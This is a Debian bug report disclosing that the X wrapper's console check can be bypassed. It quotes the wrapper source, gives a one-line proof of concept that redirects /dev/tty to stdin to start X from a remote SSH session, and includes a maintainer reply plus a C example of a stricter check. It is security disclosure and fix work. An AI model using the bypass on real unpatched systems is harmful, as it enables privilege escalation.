
Bug#652249: bypass default security level of the X wrapper



On Thu, Dec 15, 2011 at 19:02:36 +0100, vladz wrote:

> 
> Package: xserver-xorg
> Version: 1:7.5+8
> Severity: important
> Tags: security
> 
> 
> By default, the wrapper's configuration file only allows users who control
> a TTY (console) to start the X server with root privileges:
> 
>   # cat /etc/X11/Xwrapper.config
>   [...]
>   allowed_users=console
> 
> To determine if a user is controlling a TTY, the code checks the
> properties of the file connected to its standard input:
> 
>   $ cat -n debian/local/xserver-wrapper.c
>   [...]
>   152 static int
>   153 onConsole()
>   154 {
>   155 #if defined(__linux__)
>   156   struct stat s;
>   157
>   158   /* see if stdin is a virtual console device */
>   159   if (fstat(0, &s) != 0) {
>   160     (void) fprintf(stderr, "X: cannot stat stdin\n");
>   161     return FALSE;
>   162   }
>   163   if (S_ISCHR(s.st_mode) &&
>   164         ((((s.st_rdev >> 8) & 0xff) == TTY_MAJOR_DEV &&
>   165           (s.st_rdev & 0xff) < 64) ||
>   166         (((s.st_rdev >> 8) & 0xff) == ALT_TTY_MAJOR_DEV &&
>   167           (s.st_rdev & 0xff) < 64)
>   168         )) {
>   169     return TRUE;
>   170   }
> 
> As seen, this is done by checking if this file:
> 
>   - is a character device [line 163]
>   - has a TTY-specific major number (TTY_MAJOR_DEV or ALT_TTY_MAJOR_DEV,
>     respectively 4 or 5) [lines 164, 166]
>   - has a minor number lower than 64 [lines 165, 167]
> 
> Unfortunately, by connecting a file with similar properties to its
> stdin, a user can mislead the X wrapper and launch the X server.  This
> file also needs to be readable by the user.
> 
> For instance, files "/dev/tty" and "/dev/ptmx" match those conditions:
> 
>   $ ls -l /dev/tty /dev/ptmx
>   crw-rw-rw- 1 root root 5, 2 14 déc.  18:43 /dev/ptmx
>   crw-rw-rw- 1 root root 5, 0 12 déc.  23:03 /dev/tty
> 
> Here is a quick PoC by using "/dev/tty":
> 
>   $ ssh remote_host
>   $ id
>   uid=1000(vladz) gid=1000(vladz) groups=1000(vladz)
>   $ tty
>   /dev/pts/4   // not a TTY, won't have sufficient permissions to start X
>   $ X :1
>   X: user not authorized to run the X server, aborting.
> 
>   // This was the expected result, now lets connect "/dev/tty" to stdin and
>   // retry...
> 
>   $ exec 0</dev/tty; X :1; exec 0</dev/pts/4
>   [... Xorg starts ...]    // start succeed!
> 
> This being said, this is a minor issue, but the attack against
> CVE-2011-4029[1], which allows setting the read permission on any arbitrary
> file, can now be launched from remote sessions and not even from a TTY.  It
> becomes urgent to fix it.
> 
Seems like we should revert the change accepting major 5 for stdin?

Cheers,
Julien
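As an added illustration (not the wrapper's own code, nor the fix Debian eventually shipped), the following C program factors the device-number test from the quoted onConsole() into a pure function that can be exercised with constructed dev_t values, and places it next to a stricter variant that accepts only major 4, which is what Julien's suggestion to stop accepting major 5 amounts to. The majors 4 and 5 come from the report; the pts major 136 used for the "/dev/pts/4" sample is the conventional Unix98 pty slave major on Linux and is an assumption here.

```c
/* Added example, not part of xserver-wrapper.c: the st_rdev test performed
 * by the quoted onConsole(), factored out so it can be run against
 * constructed device numbers, next to a stricter variant that drops the
 * ALT_TTY_MAJOR_DEV (5) acceptance. The strict variant illustrates Julien's
 * suggestion; it is not a claim about the actual Debian fix. */
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#ifdef __linux__
#include <sys/sysmacros.h>   /* makedev(), major(), minor() */
#endif

#define TTY_MAJOR_DEV     4   /* /dev/ttyN virtual consoles */
#define ALT_TTY_MAJOR_DEV 5   /* /dev/tty, /dev/console and /dev/ptmx share this major */

/* Original test, as in the quoted wrapper: major 4 or 5 and minor < 64,
 * using the same shift/mask extraction as the wrapper source. */
static int vc_check_original(dev_t rdev)
{
    unsigned maj = (rdev >> 8) & 0xff;
    unsigned mnr = rdev & 0xff;
    return (maj == TTY_MAJOR_DEV && mnr < 64) ||
           (maj == ALT_TTY_MAJOR_DEV && mnr < 64);
}

/* Stricter test: only major 4 counts as a virtual console. Major 5 covers
 * /dev/tty and /dev/ptmx, both world-readable character devices, so
 * accepting it lets a session without a console satisfy the check. The
 * major()/minor() macros also decode the large dev_t encoding correctly. */
static int vc_check_strict(dev_t rdev)
{
    return major(rdev) == TTY_MAJOR_DEV && minor(rdev) < 64;
}

/* fstat() the given descriptor and apply one of the checks, mirroring the
 * shape of onConsole(): a failed fstat or a non-character device is a no. */
static int on_console_fd(int fd, int (*check)(dev_t))
{
    struct stat s;
    if (fstat(fd, &s) != 0) {
        perror("fstat");
        return 0;
    }
    return S_ISCHR(s.st_mode) && check(s.st_rdev);
}

int main(void)
{
    /* Constructed device numbers; (5,0) and (5,2) mirror the `ls -l` output
     * in the report for /dev/tty and /dev/ptmx. */
    struct { const char *name; dev_t rdev; } samples[] = {
        { "/dev/tty1  (4,1)",   makedev(4, 1) },
        { "/dev/tty   (5,0)",   makedev(5, 0) },
        { "/dev/ptmx  (5,2)",   makedev(5, 2) },
        { "/dev/pts/4 (136,4)", makedev(136, 4) },
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-20s original=%d strict=%d\n", samples[i].name,
               vc_check_original(samples[i].rdev),
               vc_check_strict(samples[i].rdev));

    /* Finally apply both checks to the process's real stdin. */
    printf("stdin               original=%d strict=%d\n",
           on_console_fd(0, vc_check_original),
           on_console_fd(0, vc_check_strict));
    return 0;
}
```

Running it shows the point of the report in one table: the (5,0) and (5,2) rows pass the original test exactly as a real virtual console does, while the pts device fails both, and only the strict variant distinguishes a console from /dev/tty. A check of this kind remains a heuristic about stdin, so it is worth treating the allowed_users setting as the primary control and the device test as a supporting one.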


